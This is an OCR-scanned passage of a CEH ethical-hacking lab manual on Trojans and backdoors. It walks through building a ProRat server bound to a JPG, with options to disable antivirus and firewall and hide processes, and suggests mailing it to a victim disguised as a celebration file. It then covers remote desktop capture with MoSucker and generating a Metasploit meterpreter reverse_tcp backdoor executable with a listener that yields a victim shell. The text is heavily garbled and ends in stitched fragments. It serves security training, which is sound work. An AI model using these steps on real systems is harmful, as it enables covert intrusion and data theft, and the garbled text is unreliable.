CEH Lab M an ual Trojans and Backdoors M od u le 06 Module 06 - Trojans and Backdoors Trojans and Backdoors A Trojan is a program that contains a malicious or harmful code inside apparently harmless programming or data in such a iray that it can get control and cause damage, such as mining thefile allocation table on a hard drive I C ON KEY 1^ ~ ! Valuable information Test t o u t knowledge m Web exercise L ab S c e n a rio According to Bank Into Security News (http://www.bankinfosecurity.com), Trojans pose serious risks tor any personal and sensitive information stored 011 compromised Android devices, the FBI warns But experts say any mobile device is potentially at risk because the real problem is malicious applications, which 111 an open environment are impossible to control And anywhere malicious apps are around, so is the potential for financial fraud W orkbook review According to cyber security experts, the banking Trojan known as citadel, an advanced variant o f zeus, is a keylogger that steals online-banking credentials by capturing keystrokes Hackers then use stolen login IDs and passwords to access online accounts, take them over, and schedule fraudulent transactions Hackers created tins Trojan that is specifically designed for financial fraud and sold 011 the black market You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, the theft o f valuable data from the network, and identity theft L ab O b jectiv es The objective o f tins lab is to help students learn to detect Trojan and b ack d oor attacks The objective o f the lab include: ■ Creating a server and testing a network for attack ■ Detecting Trojans and backdoors ■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected & T o o ls d e m o n str a te d in th is lab are a v a ila b le in D:\CEHTools\CEH v8 M odule T rojans and B a ck d o o rs L ab E nvironm ent To carry out tins, you need: ‫י‬ A computer mnning W indow S erver 0 as Guest-1 in virtual machine ‫י‬ W indow mnning as Guest-2 in virtual machine ‫י‬ A web browser with Internet access ■ Administrative privileges to nin tools C E H L ab M an u al P age 425 E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited Module 06 - Trojans and Backdoors Lab Duration Time: 40 Minutes Overview of Trojans and Backdoors A Trojan is a program that contains m a lic io u s or harm till code inside apparently harmless program m ing 01‫ ־‬data 111 such a way that it can g e t trol and cause damage, such as mining die file a llo c a tio n table 011 a hard disk With the help o f a Trojan, an attacker gets access to sto r ed p a ssw o r d s in a computer and would be able to read personal documents, d e le te file s, d isp lay p ictu res, an d /01‫ ־‬show messages 011 the screen Lab Tasks TASK O verview Pick an organization diat you feel is worthy of your attention Tins could be an educational institution, a commercial company, 01‫ ־‬perhaps a nonprotit chanty Recommended labs to assist you widi Trojans and backdoors: ■ Creating a Server Using the ProRat tool ■ Wrapping a Trojan Using One File EXE Maker ■ Proxy Server Trojan ■ HTTP Trojan ■ Remote Access Trojans Using Atelier Web Remote Commander ‫י‬ Detecting Trojans ‫י‬ Creating a Server Using the Theet ■ Creating a Server Using the Biodox ■ Creating a Server Using the MoSucker ‫י‬ Hack Windows using Metasploit Lab Analysis Analyze and document the results related to the lab exercise Give your opinion 011 your target’s security posture and exposure dirough public and tree information P L E A S E TALK T O Y O U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB C E H L ab M an u al P age 426 E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited M odule - T rojans and Backdoors Lab Creating a Server Using the ProRat Tool A Trojan is a program that contains malicious or harmful code inside apparent/)‫׳‬ harmless programming or data in such a way that it can get control and cause damage, such as mining thefile allocation table on a hard drive ICON KEY ^ Valuable information Test your knowledge = Web exercise m W orkbook review Lab Scenario As more and more people regularly use die Internet, cyber security is becoming more im portant for everyone, and yet many people are not aware o f it Hacker are using malware to hack personal information, financial data, and business information by infecting systems with viruses, worms, and Trojan horses But Internet security is not only about protecting your machine from malware; hackers can also sniff your data, which means that the hackers can listen to your communication with another machine O ther attacks include spoofing, mapping, and hijacking Some hackers may take control o f your and many other machines to conduct a denial-of-service attack, which makes target computers unavailable for normal business Against high-profile web servers such as banks and credit card gateways You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft Lab Objectives & T o o ls d e m o n str a te d in th is lab are a v a ila b le in D:\CEHTools\CEH v8 M odule T rojans and B a ck d o o rs C E H L ab M an u al P age 427 The objective o f tins lab is to help suidents learn to detect Trojan and backdoor attacks The objectives o f the lab include: ■ Creating a server and testing the network for attack ■ Detecting Trojans and backdoors E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited M odule - T rojans and Backdoors ‫י‬ Attacking a network using sample Trojans ancl documenting all vulnerabilities and flaws detected Lab Environment To earn‫ ״‬tins out, you need: ■ The Prorat tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Rem ote A ccess Trojans (RAT)\ProRat ■ A computer running Windows Server 2012 as Host Machine ■ A computer running Window (Virtual Machine) ■ Windows Server 2008 running 111Virtual Machine ‫י‬ ‫י‬ A web browser with Internet access Administrative privileges to run tools Lab Duration Tune: 20 Minutes Overview of Trojans and Backdoors A Trojan is a program that contains m alicious or harmful code inside apparently harmless programming or data in such a way that it can g et control and cause damage, such as ruining die file allocation table on a hard drive Note: The versions of the created Client or Host and appearance of the website may differ from what is 111 die lab, but the acmal process of creating the server and die client is the same as shown 111 diis lab Lab Tasks Create Server with ProRat Launch Windows Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Rem ote A ccess Trojans (RAT)\ProRat Double-click ProR at.exe 111 Windows Virtual Machine Click C reate Pro Rat Server to start preparing to create a server C E H L ab M an u al P age 428 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited M od ule - T rojans and Backdoors P f l D H R C H n E T F«OFE55IC]f‫>־‬HL IflTEHnET !!! Connect English PC Info Applications Message Windows Admin-FTP Funny Stuff File Manager !Explorer Search Files Control Panel Registry Shut Down PC Clipboard KeyLogger Give Damage Passwords R Downloder Printer Online Editor ProConnective Create ‫ ► י‬Create Downloader Server (2 Kbayt) Create CGI V ictim List (16 Kbayt) ^Help F IG U R E 1.1: P ro R at m ain w indow The C reate Server window appears Create Server ProConnective Notification (Network and Router) S u p p o rts R e ve rse C o n n e c tio n Notifications 1y=J P assw o rd bu tto n : R etrieve passw ords from m any services, su ch as p o p acco u n ts, m essenger, IE , mail, etc ‫ט‬ IP (DNS) Address: General Settings Test Use ProConnective Notification »ou no*1p.com Mail Notification D oesn't support R everse Connection Bind with File Test Q Use Mail Notification E-MAIL: bomberman@y ahoo com Server Extensions ICQ Pager Notification D oesn't suppoit R everse Connection Q Use ICQ Pager Notification Server Icon ic q u in : CGI Notification D oesn't support R everse Connection W) Help r Test Q Use CGI Notification CGI URL: Server Size: Test [r] http: //w w w.yoursite com/cgi-bin/prorat cgi Create Server 342 Kbayt F IG U R E 1.2: P ro R at Create Server W indow Click General S ettings to change features, such as Server Port Server Passw ord, Victim Name, and the Port Number you wish to connect over the connection you have to the victim or live the settings default Uncheck the highlighted options as shown 111 the following screenshot C E H L a b M a n u a l P a g e 429 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited M od ule - T rojans and Backdoors Server Port: Server Password: Victim Name: General Settings Q Bind with File Server Extensions 3ive a fake error message Q ••1elt server on install Q Cill AV-FW on start Q disable Windows XP SP2 Security Center I Q Disable Windows XP Firewall Server Icon Q Hear Windows XP Restore Points Q )on't send LAN notifications from ( i 92.i 68.”.“j or (10.*.x.xj I I Protection for removing Local Server Invisibility Q Hide Processes from All Task Managers (9x/2k/XP) I t y ! N o te : y o u can use D ynam ic D N S to co n n ect o v er th e In te rn e t b y using n o -ip acco u n t registration Q Hide Values From All kind of Registry Editors (9x/2k/XP) Q Hide Names From Msconfig (9x/2k/KP) Q UnT erminate Process (2k/XP) Server Size: r Create Server 342 Kbayt F IG U R E 1.3: P ro R a t C reate S erver-G eneral Settings Click Bind w ith File to bind the server with a file; 111 tins labwe are using the jpg file to bind the server Check Bind s e r v e r w ith a file Click S e l e c t F ile, and navigate to Z:\CEHv8 M odule T rojan s an d B a c k d o o r s\T r o ja n s T y p e s\R e m o te A c c e s s T rojan s (R A T )\P roR at\lm ages Select the Girl.jpg file to bind with the server m C lipboard: T o read d ata from ran d o m access m em ory This File will be Binded: Bind with File Server Extensions Server Icon Server Size: Create Server 342 Kbayt I -F IG U R E 1.4: P ro R at Binding w ith a file C E H L a b M a n u a l P a g e 430 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited M od ule - T rojans and Backdoors 10 Select Girl.jpg 111 the window and then click Open to bind the file Look in: Images ‫ו‬11°‫ת ז‬ £Q1 VNC Trojan starts a VNC server daemon in the infected system File name: Girl Open Cancel Files of type: FIGURE 1.5: ProRat binding an image 11 Click OK after selecting the image for binding with a server £ File manager: To manage victim directory for add, delete, and modify 12 111 Server E xtensions settings, select EXE (lias icon support) 111 S e lec t Server Extension options C E H L ab M an u al P age 431 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited M od ule - T rojans and Backdoors Select Server Extension Notifications General Settings ^ EXE (Has icon support) Q PIF (Has no icon support) Q BAT (Has no icon support) Q SCR (Has icon support) Q COM (Has no icon support) Bind with File Server Extensions Server Icon £ Q Give Damage: To format the entire system files Server Size: Create Server 497 Kbayt r FIGURE 1.7: ProRat Server Extensions Settings 13 111 Server Icon select any o f the icons, and click the Create Server button at bottom right side o f the ProRat window Notifications General Settings M Bind with File Server Extensions m It connects to the victim using any VNC viewer with the password “secret.” H U 11 Server Icon jJ V) Help Server Icon: Server Size: Choose new Icon Create Server 497 Kbayt I FIGURE 1.8: ProRat creating a server 14 Click OK atter the server has been prepared, as shown 111 the tollowing screenshot C E H L ab M an u al P age 432 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited M od ule - T rojans and Backdoors FIGURE 1.9: PioRat Server has created 111 die same current directory 15 N ow you can send die server file by mail or any communication media to the victim ’s machine as, for example, a celebration file to run £ G SHTTPD is a small HTTP server that can be embedded inside any program It can be wrapped with a genuine program (game cl1ess.exe) When executed, it turns a computer into an invisible web server Applicator Tools Vicvr m Preriew pane E fj‫־‬fi Details pa ne f t | M5d u n icons S A& M anage S t Extra large icons Lirt Large icons | | j Small icons |j‫״‬ Details ‫־‬t N" ₪‫־‬ □ Item check boxes □ F ilenam e extensions I I Hidden items Layout _ o © ^ « Trcjans Types ► Femote Access Trojans (RAT) A K Favorites * D esktop Irra c e s J L an g u a g e |^ 1S3J R ecen t places ‫נ ״י‬ J D ow n lea d £ D ow nload} ■ Show/hide b n d e d s e r v e r | ^ 1Fnglish £ 1‫ ^־‬f Libraries ProRat F*| D o c u m tn te j R eadm e J * M usic ^ T ‫ ״‬rk h f c l P ic tu ‫«׳‬c | V ersion.R enew als Q j Videos H o m e g ro jp C o m p u te i s L , Local Disk O ? CEH -Tools ( \ \ a ^(1 N etw o rk ite m s v ite m se lec te d MB FIGURE 1.10: ProRat Create Server 16 N ow go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Rem ote A c c e s s Trojans (RAT)\ProRat 17 Double-click binder_server.exe as shown 111 the following screenshot C E H L ab M an u al P age 433 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved Reproduction is Strictly Prohibited Module 06 - Trojans and Backdoors '‫׳‬A b o u t _ | I& Tools dem onstrated in th is lab are available in D:\CEHTools\CEHv Module 06 Trojans and B ackdoors FIGURE 10.17: setting server options 22 You can also access the victim’s machine remotely by clicking Live capture in the left pane 23 111 the Live capture option click Start, which will open the remote desktop of a victim’s machine ‫ ׳‬A b o u t' | 4288 Misc stuff 11 Disconnect 11 Options ] s g JI& _ ~x] Q m ake screen sh o t Information File related System Spy related Fun stuff I Fun stuff II Live capture Start Settings Make screenshot JPEG Quality: * 20% • 30% • 40% • 50% • 60% • 70% • 80% O 90% & oi£ FIGURE 10.18: start capturing 24 The remote desktop connection ot die victim’s machine is shown 111 die following tigiire C E H L ab M an u al P age 514 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited Module 06 - Trojans and Backdoors Rem ote adm inistration m ode ^iaijol sssei sssa&i RA m ode options Resi2 e windo-v to 4:3 JPG Quality Delay in ms | W W W V '▼ 1000 Send mouseclicks Send pressed keys Send mousemoves Autollpdate pics U Fullscreen FIGURE 10.19: capturing victim machine 25 You can access tiles, modify die files, and so on in diis mode * Rem10 te adm inistration m ode w r\ *> RA m ode o ptio ns Resize window to :3 1“ W Ij W W ▼j ! Delay in ms | *? ■ JPG Quality 190% 1000 Send mouseclcks Send pressed Leys Send mausemoves ^ E1K«‫־‬ Autollpdate pics Fullscrccp J :Tnt-.aocw & Z Cfc■‫־*־‬ Z - Crcre:5FHB ► * *■‫־‬o‫י־יי‬ I,i‫״־‬h ‫־‬ — ® 1• M o; FIGURE 10.20: capturing victim machine 26 Similarly, you can access die details o f die victim’s machine by clicking die respective functions Lab Analysis Analyze and document die results related to die lab exercise Give your opinion on your target’s security posUire and exposure through public and free information C E H L ab M an u al P age 515 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited Module 06 - Trojans and Backdoors P L E AS E TALK TO YO U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB T o o l/U tility M osu ck er In fo rm atio n C o llected /O b jectiv es A chieved O u u t: Record the screenshots o f the victim’s machine Questions Evaluate and examine various methods to connect to victims if they are 111 different cities or countries □ Yes No P latform S upported C lassroom C E H L ab M an u al P age 516 iLabs E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited Module 06 - Trojans and Backdoors Hack Windows Using Metasploit Metasp/oit Frame// ork is a toolfor developing and executing exploit code against a remote target machine I CON KEY Z^7 Valuable [ inform ation ‫ * ׳י‬T est your knowledge _ e W eb exercise * Q W orkbook review £ Lab Scenario Large companies are com mon targets for hackers and attackers o f various kinds and it is not uncom m on for these companies to be actively monitoring traffic to and from their critical IT mfrastnicture Based 011 the functionality o f the Trojan we can safely surmise that the intent o f the Trojan is to open a backdoor 011 a compromised computer, allowing a remote attacker to monitor activity and steal inform ation from the compromised computer Once installed inside a corporate network, the backdoor feamre o f the Trojan can also allow the attacker to use the initially compromised computer as a springboard to launch further forays into the rest o f the infrastructure, meaning that the wealth o f liitormation that may be stolen could potentially be far greater than that existing 011 a single machine A basic principle with all malicious programs is that they need user support to the damage to a computer That is the reason why Trojan horses try to deceive users by showing them some other form o f email Backdoor programs are used to gam unauthorized access to systems and backdoor software is used by hackers to gain access to systems so that they can send 111 the malicious software to that particular system Successful attacks by the hacker 01‫ ־‬attacker infecting the target environment with a customized Trojan horse (backdoor) determines exploitable holes 111 the current security system You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft & Tools dem onstrated in th is lab are available in D:\CEHTools\CEHv Module 06 Trojans and Backdoors C E H L ab M an u al P age 517 Lab Objectives The objective o f tins lab is to help students learn to detect Trojan and backdoor attacks The objectives o f the lab include: ■ Creating a server and testing the network for attack E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited Module 06 - Trojans and Backdoors ■ Attacking a network using sample backdoor and monitor the system activity Lab Environment To cany diis out, you need: ■ A computer running Window Server 2012 ‫י‬ BackTrack r3 running in Virtual m achine ■ W indows7 running 111 virtual machine (Victim machine) ■ A web browser with Internet access ■ Administrative privileges to mil tools Lab Duration Tune: 20 Minutes Overview of Trojans and Backdoors A Trojan is a program that contains m a licio u s or harmful code inside apparendy harmless programming or data 111 such a way that it can g e t control and cause damage, such as mining die hie allocation table on a hard drive Lab Tasks sd T A S K Create Sever C onnection Start B ackT rack virUial machine O pen the terminal console by navigating to A pplication ^ B ackT rack ‫ ^־־‬E xploitation T ools ‫ ^־־‬N etw ork E xploitation T o o ls ‫ ^־־‬M etasp loit Fram ework ‫ ^־־‬m sfc o n so le ,y A pp lica tio ns P la c e s S y s te m | A c c e ss o r ie s ^ B ackltd ck : , f Graphic* LIUC O ct : ‫ ״‬AM ‫ !*> ׳‬G athering V ulnerability A s s e s s m e n t ► ► ■0 E xp loitation Ib o ls ► K N etw ork Exploitation Tbols ‫ ! > ־׳‬ C isc o A ttack s i l l Office ►^ P n v ile g e E scalation ‫ ״‬/ ► FasM Vack ^ ► M aintaining A cc ess » Internet Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for diis tooL d ► Other B\ Exp loitation Tools ^ D a ta b a se Expl• ^ i H M eta sp lo it Fram ework ► » ► R ev e rse E n gin een n g » W ir ele ss Explo ^ m sfd i if - SAP Exploitation f l f S y s te m Tools ► ^ RFID T ools ► ^ S ocial E n gm ee ^ m sfc o n s o le ^ ► a S tr e ss Testina ‫־״‬ P h ysical E xplo ^ m sfu p d a te ► O p en Sou rce E 3b start m sfpro r f - F ore n sics ^ R eporting Tools jP S e r v ic e s ? M isce lla n eo u s D esk to p /B a ck d o o r.ex e and press Enter N ote: This IP address (10.0.0.6) is BackTrack machines These IP addresses may vary in your lab environment I I BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection File Action Media « ®S Clipboard View II 1► fe Help Applications Places system ‫ם‬ Cj !S3 T U e0C t23 3:32 PM I File Edit V iew Terminal Help 3K0a SuperHack I I Logon xracK » [ m e t a s p lo it v s - d e v [ c o r c : b a p t: ] - 927 ] = ‫ ״‬e x p l o i t s • 499 a u x i l i a r y - 151 p o s t - ] = ‫ ־ ־‬p a y lo a d s • 28 e n c o d e r s - nop s y ; > j n s f p a y lo a d w i n d o w s /n e t e r p r e t e r /r e v e r s e t c p L H O S T -1O 0.0.6 X > D e sk to p /B a c k d o o r FIGURE 11.2: CreatdngBackdoor.exe M etasploit Framework, a tool for developing and executing exploit cod e against a rem ote target machine Tins command will create a W indow s e x e c u ta b le file with name the B a ck d o o r.ex e and it will be saved on the BackTrack desktop ‫ד׳‬ BackTrack on W1N-D39MRSHL9E4 - Virtual M ach ine C onn ection J File Action Media Clipboard V !** Help it ® @g ■ !‫ ן‬it fe ^ Applications Places System U 1ue OCt 23 11:53 AM A B a ckd oor.exe " 192.168 91‫> ״‬ BSl > use e x o lo lt/B u lT l/h a n d le r f :f/ ^ nsf e x p l o i t ( h a n d l v r ) > l s e t p a y lo a d w i n d o w i / n e t e r p r e t e r / r e v e i s e t c p l p ay I o n d - > w in d o w s /m e te r p m v r T P V P r C T ‫־־‬r r p flfcf e x p l o i t ( h a n d l e r ) > sessions ■ i [ * ] s ta r tin g in te r a c tio n w ith in te r p r e te r > s h e ll Process 2540 created Channel crea ted M ic ro s o ft windows [v e rs io n 6.1.76011 C opyright (c ) 2009 M ic ro s o ft C orporation A l l rig h ts reserved C: \Users\Adtnin\Desktop?b i f I d ir volume in d riv e c has no la b e l Volume S e ria l Nunber i s 6868-71F6 O ire c to ry o f C:\U sers\Adnin\D esktop 10/23/2012 02:56 | f t p s Ljsis 1e/Sie1^1w,c1 s g f te z 3‫•״־‬w a I O ir (s ) a 56.679,985.152 b y te s lfre e C:\Users\Adrn n\Desktop>§ FIGURE 11.19: check die directories of windows Lab Analysis Analyze and document die results related to die lab exercise Give your opinion 011 your target’s security‫ ״‬posture and exposure dirough public and free information C E H L ab M a n u al P age 527 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved Reproduction is Stricdy Prohibited P L E A S E TAL K T O Y O U R I N S T R U C T O R IF Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB T o o l/U tility M etasploit In fo rm atio n C o llected /O b jectiv es A chieved O u u t: Hack the Windows machine directories In te rn e t C o n n ectio n R eq u ired □ Yes No P latform S upported C lassroom C E H L ab M an u al P age 528 iLabs E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council A l Rights Reserved Reproduction is Strictly Prohibited ... are available in D:CEHToolsCEHv8 Module 06 Trojans and Backdoors ■ McAfee Trojan located at D: CEH- ToolsCEHv8 Module 06 Trojans and Backdoors Trojans TypesProxy Server Trojans ■ A computer... Adding Lazaris game Click Add File and browse to the CEH- Tools folder at die location Z:CEHv8 Module 06 Trojans and Backdoors Trojans TypesProxy Server Trojans and add die m cafee.exe file Senna... Prohibited M od ule - T rojans and Backdoors Click die Add File button and browse to the CEH- Tools folder at die location Z:CEHv8 Module 06 Trojans and Backdoors GamesTetris and add die Lazaris.exe